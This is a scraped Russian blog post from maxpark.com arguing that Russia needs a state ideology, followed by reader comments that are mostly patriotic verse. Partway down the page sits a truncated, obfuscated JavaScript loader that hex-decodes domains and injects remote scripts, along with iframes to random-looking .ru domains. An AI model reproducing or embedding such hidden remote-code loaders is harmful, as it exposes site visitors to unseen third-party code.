СВЯТО МЕСТО , ПУСТО НЕ БЫВАЕТ

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Михаил Романцов написал
    1 оценок, 384 просмотра Обсудить (13)

     

     

    509cab6ca0a69

    Привелось мне участвовать недавно в людной конференции под названием «Государственная идеология и современная Россия». Учёные, депутаты, предприниматели, педагоги убеждали друг друга: идеология – нужна, без идеологии не получится никакого развития  Все наперебой критиковали запрет государственной идеологии, о чём написано в Конституции. Хочется верить, что народ наш всё-таки перейдёт к развитию. Причём развиваться нам придётся аварийным порядком – выбираясь из глубокой ямы разрухи и отсталостиВот если начнём выбираться – тогда-то без идеологии не обойтись кажись уже начали выбираться из ямы бездуховности и очищаться Почему? Что такое идеология и зачем она нужна . Здесь много всего напутано – и корыстного , и от непонимания и от вранья.

    Идеология – это светская религия  соединяющая в себе мирскую,материальную, социальную и бытовую  жизнь, с жизнью духовной.  Общая вера обьединяющая людейА религия, в свою очередь, это система представлений о мире и о человеке, принимаемая  пока на веру без рационального обоснования теории и прктического подтверждения и создающая твёрдые правила поведения. Человек имеющий веру,, даже слепую, необычайно силен; не зря сказано, что вера движет горами. А человек имеющий  НЕ СЛЕПУЮ, А ЗРЯЧУЮ С УБЕЖДЕНИЕМ , ТЕОРИЕЙ  И ПРАКТИКОЙ  в  1000 раз сильнее прежнего верящего в слепую.

    Когда видишь монастырь в Андах на высоте 3000 метров, построенный безо всякой строительной техники в местности, где и дышать-то трудно, начинаешь это понимать. А когда узнаёшь, как во время Великой Отечественной войны из Запорожья вывезли на Урал домну размером с 9-этажный дом, – начинаешь понимать, что вера может быть не только религиозной но и идеологической .Можно ли сегодня обойтись традиционными  религиями? Думаю, что нет  Да, хорошая идеология должна действовать совместно и дружно но  не столько  с традиционными религиями, как и учениями их или первоисточниками , так как религии  сильно искажены и сами не все понимают в  учениях Разума Бога  Вселенной  и не способны  всегда  истинно ответить на все вопросы и запросы сегодняшнего дня и стать вдохновляющей и ведущей силой для народа. Мы живём в эпоху религиозного оскудения и падения – это приходится признать. Религии, согласно современным воззрениям, является частным делом – что-то из области культурно-познавательных увлечений.

     На её место заступила светская религия -  идеология или дух.  В передовых странах она очень сильна и насаждается всей мощью государства. Это нам они запретили иметь государственную идеологию. А у них всех самих она имеется и играет  очень заметную роль. Всем, к примеру, велено веровать в демократию, которой в стране ихней и в помине нет в жизни, кроме как на словах Или велено уважать права сексменьшинствИ попробуй слово поперёк молви. Идеология, как и религия, отвечает на вопрос: кто мы такие, кто наши враги и друзья, кто наши герои и мученики за веру. Кто создал наше государство, что для него хорошо и что плохо, почему нет в мире лучше края, чем наш. Блестящее и очень компактное изложение советской идеологии содержится в песне«широка страна моя родная" – в интернете можно найти полную, не урезанную версию. Идеология  истинная или дух, если народ ее принимает как свою, вооружённый ею, развивается.

    Под  этим  я понимаю следующее: народ становится разумнее, здоровее, радостней и счастливее, квалифицированнее, многочисленнее, и поднимается бытовая культура, притом всех без изъятия, развивается наука, делаются впечатляющие открытия, процветают искусства, города и посёлки у этого народа становятся всё более чистыми и комфортабельными. Народ этот занимает всё более весомое место в кругу других народовЕсли система верований этого народа (идеология) помогает ему в этом – это правильная, разумная и истинная идеология или дух., даже если кому-то она кажется неверной, странной или даже смехотворной. Если развития и всего этого нет – она неправильная и безумная, даже если какому-то другому народу она замечательно помогла.

     

    В условиях катастрофических идеология помогает народу выжить и сохранитсяИменно такую роль играла традиционная религия, пока она была живой и  горячей, а не мертвой как сегодня и холодной.

    <script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.​loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.​replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==​typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"​function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a251​9043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

    <iframe id="a1996667054" style="" src="https://25haich4342.ru/f2.html?a=26363" width="320" height="240"></iframe><iframe id="a754394637" style="" src="https://gyh1lh20owj.ru/u.html?a=26363" width="320" height="240"></iframe>

    Loading...

    Комментировать

    осталось 1185 символов
    пользователи оставили 13 комментариев , вы можете свернуть их
    Михаил Романцов # написал комментарий 31 мая 2016, 21:04
    Счастье России, её спасение в том, что во все времена, когда ей было трудно, где-то в её далёкой глубинке рождались талантливые люди, способные полезным делом или ярким, образным словом посеять в душах людей веру. Есть много людей, для которых смысл жизни прежде всего в том, чтобы была Россия, чтобы она становилась сильнее и чище, чтобы не прерывала связь времён, не теряла того, чем гордилась в прошлом. И этот смысл нужно выразить в своих делах .
    Сергей Рязанцев # написал комментарий 31 мая 2016, 21:12
    Отсутствие идеологии, запрет государственной идеологии на самом деле нонсенс.
    Ведь идеология - это система идей, ценностей и ценностных ориентаций. Во многонациональной стране без идеологии просто невозможно. Что же будет цементирующим началом страны, куда будет двигаться страна, если нет идеи и общей идеологии?
    «Идеология – это комплекс идей и концепций, с помощью которых человек понимает общество, социальный порядок, самого себя в обществе и мире» /С.Г.Кара-Мурза. "Идеология и мать ее наука. М., 2002/
    Михаил Романцов # написал комментарий 31 мая 2016, 21:14
    О, как же падал я немало,
    Идя по жизненной тропе!
    Как мать, всегда в ущерб себе,
    Меня Россия поднимала.
    Изнемогла и ослабела
    Моя Россия, моя мать.
    Теперь мне нет иного дела —
    Её ответно поднимать.
    Ум Ник # написал комментарий 31 мая 2016, 23:36
    Объявить главной ценностью человека, декларировать достойные зарплаты, пенсии и соцзащиту, реализовать борьбу с коррупцией - этого будет достаточно. А в болтовню, любую, уже просто не поверят, не те времена.
    Михаил Романцов # ответил на комментарий Ум Ник 31 мая 2016, 23:57
    Этого вполне достаточно .
    Михаил Романцов # написал комментарий 1 июня 2016, 00:14
    Не день, не месяц и не год —
    Всегда в Россию верить нужно.
    А что касается невзгод,
    Они уйдут, как псы, послушно.
    Они сбегут в одном исподнем,
    Гонимые бичом Господним.
    Н. Зиновьев
    Михаил Романцов # ответил на комментарий Михаил Романцов 1 июня 2016, 00:15
    Не понимаю, что творится.
    Во имя благостных идей
    Ложь торжествует, блуд ярится…
    Махнуть рукой, как говорится?
    Но как же мне потом креститься
    Рукой, махнувшей на людей?..
    Михаил Романцов # ответил на комментарий Михаил Романцов 1 июня 2016, 00:18
    У России — заболевший народ .
    Инвалид, понимаешь, с детства.
    И никто ему не может помочь.
    Нету в мире такого средства.
    Понимаю, что я ни при чём,
    Понимаю, умом понимаю…
    Но немеет под левым плечом,
    Когда взгляд на него поднимаю…
    Михаил Романцов # написал комментарий 1 июня 2016, 00:20
    У карты бывшего Союза
    С обвальным грохотом в груди
    Стою. Не плачу. Не молюсь я.
    А просто нету сил уйти.
    Я глажу горы, глажу реки,
    Касаюсь пальцами морей.
    Как будто закрываю веки
    Несчастной Родины моей
    Н. Зиновьев
    Михаил Романцов # ответил на комментарий Михаил Романцов 1 июня 2016, 00:21
    Набирает дешевизну
    Жизнь, и нечем дорожить.
    Потерять свою Отчизну —
    Как ребёнка пережить.
    Михаил Романцов # ответил на комментарий Михаил Романцов 1 июня 2016, 00:22
    Я ПОНИМАЮ
    Я понимаю — не дурак, —
    Чтоб пальцы, сжатые в кулак,
    Разжать для крестного знаменья,
    Нужны и сила, и уменье,
    Но более всего — терпенье.
    Михаил Романцов # ответил на комментарий Михаил Романцов 1 июня 2016, 00:23
    Вот сменила эпоху эпоха,
    Что же в этом печальней всего?
    Раньше тайно мы верили в Бога,

    Нынче тайно не верим в Него.
    lev sivarb # написал комментарий 1 июня 2016, 13:09
    Идеология-это ЦЕЛЬ! На базе которой стороятся ВСЕ Программы Развития Любого Общества!
    Без Идеологии-Цели,невозможно даже представить себе Строительство чего-либо Цельного и Понятного.Да и становится Непонятно ,какие Методы нужны и для Чего!Все это,хорошо вписывается в теорию Хаоса.
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 1025 записей в блогах и 8226 комментариев.
    Зарегистрировалось 23 новых макспаркеров. Теперь нас 5020691.